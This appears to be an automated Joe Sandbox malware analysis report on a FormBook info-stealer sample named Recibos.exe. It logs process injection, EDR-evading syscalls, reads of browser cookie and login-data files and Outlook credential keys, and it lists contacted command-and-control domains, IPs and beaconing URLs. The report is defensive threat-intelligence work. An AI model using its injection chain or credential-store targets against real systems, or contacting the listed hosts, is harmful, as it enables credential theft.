            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1860Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\wlanext.exeThread APC queued: target process: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Recibos.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6FC008Jump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Recibos.exe"Jump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: Recibos.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: mGAzNmDsKUvf.exe, 00000005.00000002.4106139899.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000000.1965885374.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000007.00000002.4106330938.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: mGAzNmDsKUvf.exe, 00000005.00000002.4106139899.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000000.1965885374.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000007.00000002.4106330938.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: mGAzNmDsKUvf.exe, 00000005.00000002.4106139899.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000000.1965885374.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000007.00000002.4106330938.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: mGAzNmDsKUvf.exe, 00000005.00000002.4106139899.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000000.1965885374.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000007.00000002.4106330938.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.2046668076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047021260.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106577645.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047577795.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4108279577.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4105404041.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106632902.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4106506329.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.2046668076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047021260.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106577645.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047577795.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4108279577.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4105404041.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106632902.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4106506329.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572310 Sample: Recibos.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 28 www.logidant.xyz 2->28 30 www.egyshare.xyz 2->30 32 14 other IPs or domains 2->32 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Binary is likely a compiled AutoIt script file 2->46 50 2 other signatures 2->50 10 Recibos.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 mGAzNmDsKUvf.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 wlanext.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 mGAzNmDsKUvf.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 logidant.xyz 45.141.156.114, 49754, 49760, 49766 YURTEH-ASUA Germany 22->34 36 www.bcg.services 15.197.204.56, 49969, 49975, 49985 TANDEMUS United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Recibos.exe67%ReversingLabsWin32.Trojan.Vigorf
            Recibos.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.bcg.services/xz45/0%Avira URL Cloudsafe
            http://www.caj-bioteaque.online/fvpb/?pFYX4n=kyx71FegbxK9t49DmoExIvfgnNE2IR3bNVDNoxjcJXBTC458PtiM+MxjOLvzJIevsVCTQRubdLAqQTQOooLJWJpRZPL/EUuZT3AOIoIvixzKtl+SfRe7kEU=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.mffnow.info/1a34/0%Avira URL Cloudsafe
            http://www.remedies.pro/hrap/?pFYX4n=+wfvU+r0fXNkfp8ouz3K6IfbsPoraFQS1hMsf4OYg5wyJviJ8QUrWR8xRt/3ckLtqjVE/R9SKLQENxs3rgGq786i5xTgYLx/0ho5ZVxAsh3OM1RI6yAeR+s=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.mffnow.info/1a34/?rr7x1=pT0pWliPV&pFYX4n=UhEylRAMCxjlfkeBHdFlA8MxzAi/en4irJRYrSpl2vEmDrtdD83fz84LtzcmrW6WKOP6wZH/8TlB0y+yX7XcsnikQaxLyzpTE5F2560XH3FMkHnsZc7Ll0Y=0%Avira URL Cloudsafe
            http://www.exitomagnetico.online/983l/0%Avira URL Cloudsafe
            http://www.egyshare.xyz0%Avira URL Cloudsafe
            http://www.wcq77.top/bryf/0%Avira URL Cloudsafe
            http://www.1secondlending.one/alo6/?pFYX4n=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.exitomagnetico.online/983l/?pFYX4n=g8WLTYlf9hWOZIADhafhbAM9O+SGnRJzmTuFWyAeHkX1YMY2d2zKbSbTvvKDd0IL0E8lOJWyqcUo2Xu9lNGbM39YcrByqJbp3VLwmzLRU+Qq6DSKHXwmpHA=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.bienmaigrir.info/z7sc/?pFYX4n=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.caj-bioteaque.online/fvpb/0%Avira URL Cloudsafe
            http://www.logidant.xyz/ctvu/0%Avira URL Cloudsafe
            http://www.bcg.services/xz45/?pFYX4n=7Gl4eI2ymk7esmTKiyocBpF5qhx3QEeonx7jFa75SCeEQi1G+RGQY0LgPCeJyXg2C6GorcwS5UbL8Y/pt3QrWo2hcBs/CYK05Fwqw3imWS0YPWk6eLj68dM=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.wcq77.top/bryf/?rr7x1=pT0pWliPV&pFYX4n=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ=0%Avira URL Cloudsafe
            http://www.remedies.pro/hrap/0%Avira URL Cloudsafe
            http://www.bienmaigrir.info/z7sc/0%Avira URL Cloudsafe
            http://www.qqa79.top/dp98/0%Avira URL Cloudsafe
            http://www.logidant.xyz/ctvu/?pFYX4n=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.mindfulmo.life/grm8/0%Avira URL Cloudsafe
            http://www.egyshare.xyz/lp5b/0%Avira URL Cloudsafe
            http://www.qqa79.top/dp98/?pFYX4n=lwprcyOja05feUKXFvnvYGtkNDFrKAw8VdIAG4o6xNOQV3h7ueUE8JDK3GM5Ot7MjRI5G4LHbCuOcNDiB82RYmuufXO00YnTFg6+rJQDeGaEe3laXqmfCqk=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe
            http://www.mindfulmo.life/grm8/?pFYX4n=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&rr7x1=pT0pWliPV0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            wcq77.top
            		154.23.184.194
            		truefalse
              		unknown
              www.remedies.pro
              		13.248.169.48
              		truefalse
                		high
                qqa79.top
                		38.47.233.21
                		truefalse
                  		unknown
                  www.caj-bioteaque.online
                  		212.123.41.108
                  		truefalse
                    		unknown
                    www.mindfulmo.life
                    		209.74.77.108
                    		truefalse
                      		unknown
                      logidant.xyz
                      		45.141.156.114
                      		truetrue
                        		unknown
                        www.bienmaigrir.info
                        		35.220.176.144
                        		truefalse
                          		high
                          www.1secondlending.one
                          		43.205.198.29
                          		truefalse
                            		high
                            www.exitomagnetico.online
                            		172.67.182.171
                            		truefalse
                              		unknown
                              www.bcg.services
                              		15.197.204.56
                              		truefalse
                                		high
                                www.mffnow.info
                                		104.21.96.1
                                		truefalse
                                  		unknown
                                  www.egyshare.xyz
                                  		13.248.169.48
                                  		truefalse
                                    		high
                                    www.logidant.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.wcq77.top
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.betmatchx.online
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.qqa79.top
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.caj-bioteaque.online/fvpb/?pFYX4n=kyx71FegbxK9t49DmoExIvfgnNE2IR3bNVDNoxjcJXBTC458PtiM+MxjOLvzJIevsVCTQRubdLAqQTQOooLJWJpRZPL/EUuZT3AOIoIvixzKtl+SfRe7kEU=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bcg.services/xz45/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.remedies.pro/hrap/?pFYX4n=+wfvU+r0fXNkfp8ouz3K6IfbsPoraFQS1hMsf4OYg5wyJviJ8QUrWR8xRt/3ckLtqjVE/R9SKLQENxs3rgGq786i5xTgYLx/0ho5ZVxAsh3OM1RI6yAeR+s=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.wcq77.top/bryf/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.exitomagnetico.online/983l/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mffnow.info/1a34/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mffnow.info/1a34/?rr7x1=pT0pWliPV&pFYX4n=UhEylRAMCxjlfkeBHdFlA8MxzAi/en4irJRYrSpl2vEmDrtdD83fz84LtzcmrW6WKOP6wZH/8TlB0y+yX7XcsnikQaxLyzpTE5F2560XH3FMkHnsZc7Ll0Y=false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.1secondlending.one/alo6/?pFYX4n=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.exitomagnetico.online/983l/?pFYX4n=g8WLTYlf9hWOZIADhafhbAM9O+SGnRJzmTuFWyAeHkX1YMY2d2zKbSbTvvKDd0IL0E8lOJWyqcUo2Xu9lNGbM39YcrByqJbp3VLwmzLRU+Qq6DSKHXwmpHA=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bienmaigrir.info/z7sc/?pFYX4n=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.caj-bioteaque.online/fvpb/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.logidant.xyz/ctvu/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bcg.services/xz45/?pFYX4n=7Gl4eI2ymk7esmTKiyocBpF5qhx3QEeonx7jFa75SCeEQi1G+RGQY0LgPCeJyXg2C6GorcwS5UbL8Y/pt3QrWo2hcBs/CYK05Fwqw3imWS0YPWk6eLj68dM=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bienmaigrir.info/z7sc/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.wcq77.top/bryf/?rr7x1=pT0pWliPV&pFYX4n=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ=false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.qqa79.top/dp98/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.remedies.pro/hrap/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.logidant.xyz/ctvu/?pFYX4n=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mindfulmo.life/grm8/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.egyshare.xyz/lp5b/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.qqa79.top/dp98/?pFYX4n=lwprcyOja05feUKXFvnvYGtkNDFrKAw8VdIAG4o6xNOQV3h7ueUE8JDK3GM5Ot7MjRI5G4LHbCuOcNDiB82RYmuufXO00YnTFg6+rJQDeGaEe3laXqmfCqk=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mindfulmo.life/grm8/?pFYX4n=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&rr7x1=pT0pWliPVfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verificationmGAzNmDsKUvf.exe, 00000007.00000002.4106766199.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/chrome_newtabwlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icowlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.egyshare.xyzmGAzNmDsKUvf.exe, 00000007.00000002.4108279577.0000000004B66000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ac.ecosia.org/autocomplete?q=wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                45.141.156.114
                                                                		logidant.xyzGermany
                                                                		30860YURTEH-ASUAtrue
                                                                38.47.233.21
                                                                		qqa79.topUnited States
                                                                		174COGENT-174USfalse
                                                                209.74.77.108
                                                                		www.mindfulmo.lifeUnited States
                                                                		31744MULTIBAND-NEWHOPEUSfalse
                                                                13.248.169.48
                                                                		www.remedies.proUnited States
                                                                		16509AMAZON-02USfalse
                                                                212.123.41.108
                                                                		www.caj-bioteaque.onlineGermany
                                                                		12915EPAG-ASDEfalse
                                                                43.205.198.29
                                                                		www.1secondlending.oneJapan4249LILLY-ASUSfalse
                                                                104.21.96.1
                                                                		www.mffnow.infoUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                154.23.184.194
                                                                		wcq77.topUnited States
                                                                		174COGENT-174USfalse
                                                                35.220.176.144
                                                                		www.bienmaigrir.infoUnited States
                                                                		15169GOOGLEUSfalse
                                                                172.67.182.171
                                                                		www.exitomagnetico.onlineUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                15.197.204.56
                                                                		www.bcg.servicesUnited States
                                                                		7430TANDEMUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1572310
                                                                Start date and time:2024-12-10 12:15:58 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 11s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Potential for more IOCs and behavior
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Recibos.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@14/11
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • VT rate limit hit for: Recibos.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                06:18:03API Interceptor9661041x Sleep call for process: wlanext.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                45.141.156.114YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                • www.logidant.xyz/iuvu/
                                                                BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                • www.logidant.xyz/iuvu/
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.logidant.xyz/ctvu/
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.logidant.xyz/ctvu/
                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                • www.logidant.xyz/iuvu/
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.logidant.xyz/ctvu/
